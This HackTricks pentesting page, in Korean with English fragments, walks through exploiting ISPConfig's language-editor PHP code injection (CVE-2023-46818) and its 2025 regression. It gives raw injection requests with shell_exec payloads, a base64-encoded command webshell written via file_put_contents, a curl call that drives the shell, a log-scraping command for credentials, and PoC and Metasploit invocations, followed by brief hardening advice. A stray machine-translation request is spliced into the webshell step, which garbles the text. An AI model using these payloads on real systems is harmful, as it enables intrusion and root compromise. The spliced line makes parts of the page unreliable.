ISPConfig

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

개요

ISPConfig는 오픈 소스 호스팅 컨트롤 패널입니다. 구버전 3.2.x 빌드에는 언어 파일 편집기 기능이 포함되어 있었으며, 해당 기능이 슈퍼 관리자에게 활성화되어 있을 경우 잘못된 번역 레코드를 통해 임의의 PHP 코드 주입을 허용했습니다. 이는 웹 서버 컨텍스트에서 RCE를 초래할 수 있으며, PHP가 어떻게 실행되는지에 따라 권한 상승으로 이어질 수 있습니다.

주요 기본 경로:

• 웹 루트는 php -S로 제공되거나 Apache/nginx를 통해 제공될 때 /var/www/ispconfig에 있는 경우가 많습니다.
• 관리자 UI는 HTTP(S) vhost에서 접근 가능하며(때로는 localhost에만 바인딩되어 있을 수 있으니; 필요하면 SSH port-forward를 사용하세요).

팁: 패널이 로컬에 바인딩되어 있으면(예: 127.0.0.1:8080), 포워딩하세요:

ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001

Language editor PHP code injection (CVE-2023-46818)

• Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
• Preconditions:
  • Login as the built-in superadmin account admin (other roles are not affected according to the vendor)
  • Language editor must be enabled: admin_allow_langedit=yes in /usr/local/ispconfig/security/security_settings.ini
• Impact: 인증된 관리자는 언어 파일에 쓰여 애플리케이션에 의해 실행되는 임의의 PHP를 주입할 수 있으며, 웹 컨텍스트에서 RCE를 달성합니다

References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

Manual exploitation flow

1. Open/create a language file to obtain CSRF tokens

첫 번째 POST를 보내 폼을 초기화하고 HTML 응답에서 CSRF 필드(csrf_id, csrf_key)를 파싱합니다. 예시 요청 경로: /admin/language_edit.php.

2. Inject PHP via records[] and save

두 번째 POST를 전송하여 CSRF 필드와 악성 번역 레코드를 포함시킵니다. 최소한의 command-execution probes:

POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>

Out-of-band 테스트 (ICMP 관찰):

records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>

3. 파일 작성 및 webshell 업로드

file_put_contents를 사용하여 웹에서 접근 가능한 경로(예: admin/) 아래에 파일을 생성하세요:

records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>

그런 다음 POST 본문에서 문제가 되는 문자를 피하기 위해 base64를 사용한 간단한 webshell을 작성하세요:

records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>

해당 파일(src/network-services-pentesting/pentesting-web/ispconfig.md)의 내용을 여기에 붙여 넣어 주세요. 붙여 넣어 주시면 Markdown/HTML 태그·링크·경로는 그대로 유지하면서 영어 본문을 한국어로 번역해 드리겠습니다.

curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'

PHP가 루트로 실행되는 경우(예: root가 시작한 php -S 127.0.0.1:8080), 즉시 root RCE를 획득합니다. 그렇지 않으면 웹 서버 사용자 권한으로 코드 실행을 얻습니다.

2025 회귀 (ISPConfig 3.3.0 / 3.3.0p1)

언어 편집기 버그가 3.3.0/3.3.0p1에서 다시 발생했으며 3.3.0p2에서 수정되었습니다. 전제조건은 변경되지 않았습니다(admin_allow_langedit 및 관리자 로그인). 동일한 패치에서 monitor XSS와 world-readable rotated logs 문제도 해결되었습니다.

참고:

• 3.3.0/3.3.0p1에서는 /usr/local/ispconfig/interface/log/ 아래의 world-readable rotated logs가 debug logging이 활성화된 경우 자격 증명을 leak할 수 있습니다:

find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head

• Exploit 단계는 CVE-2023-46818과 일치합니다; 3.3.0p2는 언어 편집 전에 추가 검사를 수행합니다.

Python PoC

바로 사용할 수 있는 exploit는 token handling과 payload delivery를 자동화합니다:

• https://github.com/bipbopbup/CVE-2023-46818-python-exploit

실행 예:

python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>

Metasploit 모듈 (2025년 7월 공개)

Rapid7이 exploit/linux/http/ispconfig_lang_edit_php_code_injection 모듈을 추가했으며, 제공된 관리자 계정이 system-config 권한을 가지고 있으면 admin_allow_langedit를 자동으로 활성화할 수 있습니다.

use exploit/linux/http/ispconfig_lang_edit_php_code_injection
set RHOSTS 10.10.10.50
set RPORT 8080
set USERNAME admin
set PASSWORD <admin_pass>
set TARGETURI /
run

해당 모듈은 records[]를 통해 base64로 인코딩된 payload를 기록하고 이를 실행하여 PHP Meterpreter 또는 custom payload를 얻습니다.

하드닝

• 원래 문제에 대해서는 3.2.11p1 이상으로 업그레이드하고, 2025 회귀에 대해서는 3.3.0p2 이상으로 업그레이드하세요.
• 언어 편집기는 엄격히 필요하지 않은 한 비활성화하세요:

admin_allow_langedit=no

• 패널을 root로 실행하지 마세요; PHP-FPM 또는 웹 서버를 구성하여 권한을 낮추도록 하세요
• 내장된 admin 계정에 대해 강력한 인증을 적용하세요

참고자료

• ISPConfig 3.2.11p1 Released (fixes language editor code injection)
• CVE-2023-46818 – NVD
• bipbopbup/CVE-2023-46818-python-exploit
• HTB Nocturnal: Root via ISPConfig language editor RCE
• ISPConfig 3.3.0p2 Released – Security Update
• CXSecurity WLB-2025070017 – Metasploit module for ISPConfig language_edit.php

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.